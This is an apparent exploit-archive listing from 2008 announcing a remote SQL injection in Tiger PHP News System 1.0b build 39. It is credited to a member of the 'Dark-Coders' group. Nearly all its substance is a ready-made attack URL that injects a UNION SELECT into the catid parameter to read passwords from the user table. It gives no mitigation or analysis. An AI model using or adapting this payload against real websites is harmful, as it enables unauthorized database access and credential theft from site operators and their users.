Tiger PHP News System 1.0b build 39 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Tiger PHP News System 1.0b build 39 Remote SQL Injection Vulnerability
# Published : 2008-01-25
# Author : 0in
# Previous Title : Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities
# Next Title : flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability

/*
 *Tiger PHP News System SQL Injection
 *Bug found bY 0in from DaRk-Coders Group!
 *Homepage: http://dark-coders.4rh.eu or http://dark-coders.prv.pl
 *IRC:#dark-coders at irc.freenode.org
 *Email: 0in(dot)email(at)gmail(dot)com
*/

 Script home: http://tpns.k-na.se/
 Exploit: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20from%20user

 Greetings to:All Dark-Coders Team Members - Die-Angel,m4r1usz,suN8Hclf,Djlinux,
 Aristo89

# www.Syue.com [2008-01-25]